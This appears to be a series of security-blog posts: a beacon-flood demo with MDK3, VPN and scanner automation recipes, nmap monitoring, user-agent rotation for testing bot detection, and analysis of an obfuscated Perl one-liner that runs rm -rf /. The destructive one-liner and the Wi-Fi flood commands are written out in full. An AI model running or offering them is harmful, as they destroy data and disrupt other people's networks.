I have been reading a lot about Beacon Frames on my vacation this week (stop laughing) and I came across a tool in Kali called MDK3 that will allow you to send fake beacon frames. I couldn't pass up a chance to test this, so I pulled out my trusty TL-WN722N and made a list of the 5,000 most common SSIDs from wigle.net.
Here are the commands to run it, assuming your wireless interface is wlan0:
Grab the commonssids.txt from my gist:
wget https://gist.githubusercontent.com/jgamblin/da795e571fb5f91f9e86a27f2c2f626f/raw/0e5e53b97e372a21cb20513d5064fde11aed844c/commonssids.txt
Start airmon-ng:
airmon-ng start wlan0
Start MDK3 with the string:
mdk3 wlan0mon b -f commonssids.txt -g -t -m -s 1000
Here are the command flags:
b - Beacon Flood Mode
f - Read SSIDs from file
g - Show station as 54 Mbit
t - Show station using WPA TKIP encryption
m - Use valid access point MAC from OUI database
s - Set speed in packets per second
Here is what the output looks like:
Here is what the wireless list looks like on a host:
As always be careful using this anywhere that it could cause issues with other people’s internet access. No one likes a jerk.
Thanks to PoisonTap I have finally had a reason to pull my PiZero out of the ever-growing “Stuff to Hack” pile and start working on it. I have a couple of neat ideas coming down the pipeline, but this weekend I built a VPN sidecar using a USB OTG gadget. I wanted to be able to use the PiZero to offload some slow processes (big nmap scans) and as a place to verify findings through an always-on VPN connection (I like and use Private Internet Access).
Configuration is fairly simple and only takes about 30 minutes:
Install your PiZero as an Ethernet gadget.
Share Your Internet Connection With Your Pi:
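If your host machine is Linux, sharing the uplink comes down to enabling IP forwarding plus NAT. A minimal sketch, assuming eth0 is the host's uplink and usb0 is the Pi's gadget interface (check yours with `ip link`):

```shell
# Sketch only: interface names are assumptions for this example.
sudo sysctl -w net.ipv4.ip_forward=1
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
sudo iptables -A FORWARD -i usb0 -o eth0 -j ACCEPT
sudo iptables -A FORWARD -i eth0 -o usb0 -m state --state RELATED,ESTABLISHED -j ACCEPT
```

On macOS the equivalent is the Internet Sharing checkbox under System Preferences → Sharing.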
You can now log in to your PiZero at:
[email protected]
Update Your Pi and install OpenVPN:
sudo apt-get update && sudo apt-get -y dist-upgrade
sudo apt-get -y install openvpn
wget https://www.privateinternetaccess.com/openvpn/openvpn.zip
unzip openvpn.zip -d openvpn
sudo cp openvpn/ca.rsa.2048.crt openvpn/crl.rsa.2048.pem /etc/openvpn/
sudo cp "openvpn/US Texas.ovpn" "/etc/openvpn/Texas.conf"
# You can use a different VPN endpoint if you like. Note the extension change from .ovpn to .conf.
sudo reboot
Create /etc/openvpn/login
containing only your username and password, one per line, for example:
username
password123
Change the permissions on this file so only the root user can read it:
sudo chmod 600 /etc/openvpn/login
Set up OpenVPN to use your stored username and password by editing the config file for the VPN endpoint:
sudo nano /etc/openvpn/Texas.conf
Change the following lines so they go from this:
auth-user-pass > auth-user-pass /etc/openvpn/login
crl-verify crl.rsa.2048.pem > crl-verify /etc/openvpn/crl.rsa.2048.pem
ca ca.rsa.2048.crt > ca /etc/openvpn/ca.rsa.2048.crt
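Those three edits can also be scripted with sed instead of nano. Here is a sketch that demonstrates the substitutions on a temporary copy; point CONF at /etc/openvpn/Texas.conf (and run sed with sudo) to do it for real:

```shell
# Demo on a temp file; the real target would be /etc/openvpn/Texas.conf.
CONF=$(mktemp)
printf 'auth-user-pass\nca ca.rsa.2048.crt\ncrl-verify crl.rsa.2048.pem\n' > "$CONF"
sed -i \
  -e 's|^auth-user-pass$|auth-user-pass /etc/openvpn/login|' \
  -e 's|^ca ca.rsa.2048.crt$|ca /etc/openvpn/ca.rsa.2048.crt|' \
  -e 's|^crl-verify crl.rsa.2048.pem$|crl-verify /etc/openvpn/crl.rsa.2048.pem|' \
  "$CONF"
cat "$CONF"
```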
Test VPN:
sudo openvpn --config /etc/openvpn/Texas.conf
If the VPN is working you will see:
Next step is to enable VPN at boot:
sudo systemctl enable openvpn@Texas
sudo reboot
After reboot verify VPN connection:
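A couple of quick checks, assuming the tunnel interface comes up as tun0:

```shell
ip addr show tun0            # the tunnel interface should exist and have an address
curl -s https://ifconfig.co  # should print the VPN exit IP, not your home IP
```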
You now have an always-on PiZero USB VPN sidecar! Have fun. 🙂
In the last two years Burp Suite Proxy has become my go-to web application security scanner. As with everything recently, if I can automate it, I do. So this weekend I built a simple script to scan a website with Burp, create a PDF report and post it to Slack:
Here is how I set it up:
- Create a SlackBot and copy API Key.
- Install and Configure Burp & Carbonator (I ended up having to install RDP to do this 🤷)
- Install wkhtmltopdf
- Copy this shell script to autoburp.sh and update as needed (add your token):
https://gist.github.com/jgamblin/90c7aa1b369d1aa1e77b0af03216b9e1
- Copy this line to your crontab to run this scan at 0100 on Mondays:
00 01 * * 1 ./autoburp.sh
- Enjoy weekly automated Burp scanning and Slack reporting of your website.
I have recently been automating a lot of my technical security tasks and building slack bots around them and it was w3af‘s turn. W3af is an amazing open source web application security scanner that my friend Andres Riancho writes and maintains.
The goal of this project was to build scheduled, automated scans of my web properties with PDF reporting and Slack alerting:
Configuration is fairly easy.
- Create a SlackBot and copy API Key.
- Update and install needed software on server:
sudo apt-get update && sudo apt-get dist-upgrade
sudo apt-get install w3af
- Install wkhtmltopdf in headless mode.
- Create necessary folders:
sudo mkdir /w3af
- Copy this shell script and update the token:
https://gist.github.com/jgamblin/ae1bdb24113788e70b91d0cc826a163f
- Copy this w3af config file:
https://gist.github.com/jgamblin/2133162778e1d438f57114946b6244d6
- Copy this line to your crontab to run this scan every night at midnight:
00 00 * * * ./w3af/w3af.sh
- Enjoy automated w3af scans with Slack alerting.
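If you would rather roll your own than grab the gist, a w3af batch script looks roughly like this; the plugin selection, output path and target below are assumptions for illustration, and the script runs headless with ./w3af_console -s /tmp/scan.w3af:

```shell
# Sketch: write a w3af batch script to run headless.
# Plugin choices, output path and target are assumptions for this example.
cat > /tmp/scan.w3af <<'EOF'
plugins
output console,html_file
output config html_file
set output_file /tmp/report.html
back
crawl web_spider
audit xss,sqli
back
target
set target https://example.com
back
start
exit
EOF
```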
As I have talked about before, “You can’t defend what you don’t know exists,” so today while sitting around trying to recover from walking pneumonia I wrote slackmap to continually nmap a network and post the differences to Slack:
Configuration is amazingly easy. I run a copy of this on a $5 a month Digitalocean Droplet for an external view and a Raspberry Pi for internal scanning.
- Create a SlackBot and copy API Key.
- Update and install needed software on server:
sudo apt-get update && sudo apt-get dist-upgrade
sudo apt-get install ssmtp nmap xsltproc
- Create necessary folders:
sudo mkdir /nmap/
sudo mkdir /nmap/diffs
- Copy this to /nmap/slackmap.sh and add SlackBot API key to Line 8:
https://gist.github.com/jgamblin/7d64a284e5291a444e12c16daebc81e0
- Copy this line to your crontab to run this scan every 15 minutes (make longer for bigger networks):
*/15 * * * * /nmap/slackmap.sh
- Enjoy a new level of network visibility. : )
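The core of the script is just a scan, a diff against the previous run, and a curl to Slack. Here is a stripped-down sketch of that idea; the webhook URL variable is an assumption, the curl is commented out so the demo just prints the payload, and fake scan files stand in for real nmap/ndiff output:

```shell
# Stripped-down sketch of the diff-and-post idea. Fake scan files stand in
# for real nmap output; the Slack webhook call is commented out.
mkdir -p /tmp/nmap/diffs && cd /tmp/nmap/diffs
printf 'Host 10.0.0.5: 22/tcp open\n' > scan-prev.txt
printf 'Host 10.0.0.5: 22/tcp open\nHost 10.0.0.9: 80/tcp open\n' > scan-new.txt
if ! diff -u scan-prev.txt scan-new.txt > changes.txt; then
  # Only the added lines ("+Host ...") go into the Slack message.
  payload=$(printf '{"text":"Network change detected:\\n%s"}' "$(grep '^+Host' changes.txt)")
  echo "$payload"
  # curl -s -X POST -H 'Content-type: application/json' \
  #   --data "$payload" "$SLACK_WEBHOOK_URL"
fi
```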
I am often asked “What is the easiest thing companies can do to secure their networks?” and my answer is always “Know what is on your network.” While that is simple advice, it is a lot harder to implement. One company I was working with was looking at a system to do continuous network monitoring (read: scheduled nmap scans) for $40,000 a year.
After I cried for the state of my industry I told them I could do this for them with a small shell script, a $5 a month Digital Ocean Droplet and a free Sendgrid account.
Here is how I did it:
- Created a free Sendgrid account.
- Spun up a $5-a-month DigitalOcean Ubuntu Droplet.
- Added an nmaper.company.com DNS record to be perfectly clear what the box was doing.
- Updated and installed needed software:
sudo apt-get update && sudo apt-get dist-upgrade
sudo apt-get install ssmtp nmap xsltproc
- Created necessary folders:
mkdir /root/nmap/
mkdir /root/nmap/diffs
- Edit /etc/ssmtp/ssmtp.conf with this:
[email protected]
mailhub=smtp.sendgrid.com
rewriteDomain=
[email protected]
UseSTARTTLS=YES
AuthUser=jgamblin
AuthPass=password
FromLineOverride=YES
- Copy this to /root/nmap/scan.sh:
#!/bin/sh
# Scan the targets, diff against the previous scan and email any changes.
TARGETS="jerrygamblin.com scanme.nmap.org"
OPTIONS="-v -sV -T4 -F --open"
date=$(date +%F%T)
cd ~/nmap/diffs || exit 1
nmap $OPTIONS $TARGETS -oA "scan-$date" > /dev/null
email()
{
/usr/sbin/ssmtp [email protected] <<EOF
From: [email protected]
Subject: nmap ndiff
$(date +"%Y-%m-%d")
*** NDIFF RESULTS ***
$(cat "diff-$date")
EOF
}
# ndiff exits 1 when the scans differ, so only email on changes.
if [ -e scan-prev.xml ]; then
ndiff scan-prev.xml "scan-$date.xml" > "diff-$date"
[ "$?" -eq "1" ] && email
fi
ln -sf "scan-$date.xml" scan-prev.xml
- Test it (add
cat diff-$date
to the bottom of the script to see the output).
- Add a cron job to crontab to run it every 15 minutes (or every hour for bigger networks):
*/15 * * * * /root/nmap/scan.sh
- Talk your boss into buying you something awesome with the $39,970 in savings.
It was as simple as that, and I put this together in an afternoon. Up next is to build a Slackbot to deliver the differences to their Slack channel.
I use DigitalOcean for a majority of my testing and from time to time I need a desktop environment to run some of my tools (like Burp). After spending much more time than I want to admit, I have it down to these 10 commands to bring an Ubuntu + MATE + XRDP desktop to an Ubuntu Droplet:
sudo apt-get update && sudo apt-get dist-upgrade -y
sudo apt-get install --no-install-recommends ubuntu-mate-core ubuntu-mate-desktop -y
sudo apt-get install mate-core mate-desktop-environment mate-notification-daemon xrdp -y
adduser burp
usermod -aG admin burp
usermod -aG sudo burp
su - burp
echo mate-session > ~/.xsession
sudo cp /home/burp/.xsession /etc/skel
sudo service xrdp restart
From there you can use any RDP viewer to connect to your droplet:
Earlier this week someone sent me this one line perl script (that you shouldn’t run):
perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;; y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
Due to some really clever code obfuscation it runs rm -rf /.
You can deobfuscate (is that a word?) it with this:
perl -e 's;;=]=>%-{<-|}<&|`{;; y; -/:-@[-`{-};`-{/" -;;print "$_\n"'
While trying to figure out how this code worked I stumbled upon the fact that macOS does not require --no-preserve-root, which has been required since version 6.4 of GNU Core Utilities, released in 2006.
Here is what happens if you run perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;; y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
on Ubuntu 16.10:
Here is what happens if you run perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;; y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
on MacOS 10.12:
This seems like a pretty big oversight by the Apple team and I have filed a bug report but haven’t heard anything yet.
Recently I have been working with some NGFW tools to automatically detect and block when someone is scraping, brute forcing or “load testing” your website. I quickly ran into a problem where none of the tools I use would allow me to quickly change user agents so I put together a couple of quick scripts that call one of 7500 valid user agents from this file.
First I went with the old standby of curl, which does the job, but I was only able to do 10 requests in 4 seconds.
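One way to rotate agents is to pull a random line from the file and pass it to curl with -A. A minimal sketch; the useragents.txt filename and sample entries below are stand-ins for the full 7,500-line file:

```shell
# Build a tiny sample list; swap in the full user-agent file.
cat > useragents.txt <<'EOF'
Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12)
Mozilla/5.0 (X11; Linux x86_64)
EOF
# Pick one agent at random for this request.
UA=$(shuf -n 1 useragents.txt)
echo "Using agent: $UA"
# curl -s -A "$UA" https://example.com -o /dev/null   # uncomment to send
```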
Here is what the output of curl.sh looks like:
That was not going to be fast enough for my testing needs, so I switched to Apache Bench and was able to do 1,000 requests in 2 seconds, which was what I needed for proper testing.
Here is what the output of ab.sh looks like:
All the scripts are in this GitHub Repo.
As always: Use these for good, not bad.
I use nmap all the time at work and recently came across rainmap-lite which is an amazing web interface for nmap that allows you to easily schedule and email scan results. I wanted to be able to share it with a class I am teaching so I did what I have been doing lately and put it into a docker container:
Running it is as simple as:
docker run -ti -p 8080:8080 --name rainmap jgamblin/rainmap
Then access:
http://yourip:8080/console
You can now run a ton of nmap scans and get the results emailed to you and your team:
Here is the Dockerfile:
FROM ubuntu:latest
RUN apt-get update && apt-get install sqlite3 git nmap python-pip -y
RUN pip install --upgrade pip
RUN pip install lxml
RUN pip install Django
RUN git clone https://github.com/cldrn/rainmap-lite
WORKDIR /rainmap-lite/rainmap-lite/
ADD run.sh /rainmap-lite/rainmap-lite/run.sh
RUN chmod 777 /rainmap-lite/rainmap-lite/run.sh
CMD ./run.sh
Here is the run.sh:
#!/bin/bash
sed -i "s/8000/8080/g" "nmaper-cronjob.py"
echo "What is your public IP address?"
read -r ip
sed -i "s/127.0.0.1/$ip/g" "nmaper-cronjob.py"
echo "What is your SMTP user name?"
read -r user
sed -i "s/[email protected]/$user/g" "nmaper-cronjob.py"
echo "What is your SMTP password?"
read -r pass
sed -i "s/yourpassword/$pass/g" "nmaper-cronjob.py"
echo "What is your SMTP address?"
read -r smtp
sed -i "s/smtp.gmail.com/$smtp/g" "nmaper-cronjob.py"
python manage.py migrate
python manage.py loaddata nmapprofiles
python manage.py createsuperuser
python manage.py runserver 0.0.0.0:8080 &
while true
do
python nmaper-cronjob.py
sleep 15
done
Protip: SendGrid offers a free SMTP server.